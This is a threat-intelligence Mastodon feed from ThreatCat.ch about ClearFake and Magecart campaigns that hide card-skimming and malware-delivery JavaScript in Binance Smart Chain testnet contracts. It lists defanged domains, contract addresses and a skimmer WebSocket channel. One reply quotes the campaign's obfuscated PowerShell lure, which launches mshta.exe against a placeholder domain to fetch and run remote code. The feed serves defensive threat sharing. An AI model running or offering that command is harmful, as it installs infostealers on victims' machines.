ThreatCat.ch

@[email protected]
231 Followers
5 Following
225 Posts

ThreatCat.ch has been founded in the autumn 2022 and consists of a bunch of experienced Cyber Threat Analysts and Incident Responders who have been working together for many years. We decided to create ThreatCat.ch to be able to serve the community by providing warnings and insights about emerging cyber threats. Occasionally we may also write about tools and tricks we have learned in our daily work life. And of course, ThreatCat.ch is about having fun doing interesting stuff together.

Currently we are publishing information on https://twitter.com/threatcat_ch and https://github.com/threatcat-ch/. All our information is distributed under Creative Commons CC BY 4.0 and all our opinions is ours and not that of our employers. You can always reach out to us via [email protected].

Twitterhttps://twitter.com/threatcat_ch
Bluesky@threatcat-ch.bsky.social
GitHubhttps://github.com/threatcat-ch
ThreatCat.chMar 19, 2025
@sekoia_io published a nice blog post about BSC (Binance Smart Chain) https://blog.sekoia.io/clearfakes-new-widespread-variant-increased-web3-exploitation-for-malware-delivery/
@threatcat_ch is tracking BSC as well, and we share our gained information on Threatfox/MalwareBazaar @abuse_ch As a side note, most of the delivered payloads led to Rhadamantys (https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys) instead of Lumma in the last few days.
ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery

ClearFake spreads malware via compromised websites, using fake CAPTCHAs, JavaScript injections, and drive-by downloads.

Sekoia.io Blog
ThreatCat.chMar 16, 2025

This #Magecart smart contract got updated recently and is now pointing to keritysuc[.]xyz

https://infosec.exchange/@threatcat_ch/114082428887661948

ThreatCat.ch (@[email protected])

#etherhiding (hiding malicious code in blockchain based smart contracts) is not only by #ClearFake related actors – but now also for #Magecart 👇

Infosec Exchange
Show threadThreatCat.chFeb 28, 2025

Decoding gives us another WebSocket based communication channel: wss://cdn[.]iconstaff[.]top/common?source=

Domain iconstaff[.]top was already reported as being Magecart related in June 2024: https://blog.sucuri.net/2024/06/caesar-cipher-skimmer.html

Decoding the Caesar Cipher Skimmer

Discover the latest credit card skimming threat, the "Caesar Cipher Skimmer," affecting multiple CMS platforms like WordPress and Magento. Learn how it works and get essential tips to protect your ecommerce website from these sophisticated attacks.

Sucuri Blog
Show threadThreatCat.chFeb 28, 2025
Let’s take transaction 0x863f7[…] at Sep-02-2024 02:34:55 PM UTC – we get the following decoded JS:
https://testnet.bscscan.com/tx/0x863f748c5965d4ef39b46a621fd764a3a6c03f591376a20af78e4070b7220a74
Show threadThreatCat.chFeb 28, 2025
Another confirmation of the malicious, Magecart related activity, can be found by analyzing other activities from the main BSC testnet contract 0x5178a932d5b312801e02c43fd50399a88028b9d0
https://testnet.bscscan.com/address/0x5178a932d5b312801e02c43fd50399a88028b9d0
Show threadThreatCat.chFeb 28, 2025
This assumption is reinforced when we get a further obfuscated payload from suckerity[.]xyz when visiting the checkout page & subsequently noticing a client to server data exfiltration after having entered credit card details (small extract of the ~200KB deobfuscated code)
Show threadThreatCat.chFeb 28, 2025

While investigating an infected website, we noticed call to BSC testnet contract 0x0967296defa0fd586c9ede5730380e2b059fab95 : https://testnet.bscscan.com/address/0x0967296defa0fd586c9ede5730380e2b059fab95

The contract’s content is clearly malicious and connects over WebSocket to suckerity[.]xyz (behind Cloudflare), not related to #ClearFake, but reminds us #Magecart related injections:

ThreatCat.chFeb 28, 2025
#etherhiding (hiding malicious code in blockchain based smart contracts) is not only by #ClearFake related actors – but now also for #Magecart 👇
ThreatCat.chFeb 8, 2025
Show threadttakvamFeb 7, 2025

@threatcat_ch Been checking in on this campaign from time to time. New changes:

powershell -w 1 powershell -Command ('ms]]]ht]]]a]]].]]]exe https://[DOMAIN]i=${usr_id}' -replace ']')

Also, the info stealer has been changed. Not certain of which as of now. But seems very similar to ACR Stealer.

ThreatCat.chFeb 3, 2025
Johannes Bader Jan 30, 2025

Today, I'm releasing the first version of a small web app I've been working on for the past few months 🚀: https://rosti.bin.re/

It semi-automatically parses blog posts & reports from nearly 200 cybersecurity sites, extracting IOCs & YARA rules. You can grab the intel in various formats from the website or via API.

I hope it proves useful to some of you ... 🙏✨ #CyberSecurity #ThreatIntel

Rösti - Repackaged Öpen Source Threat Intelligence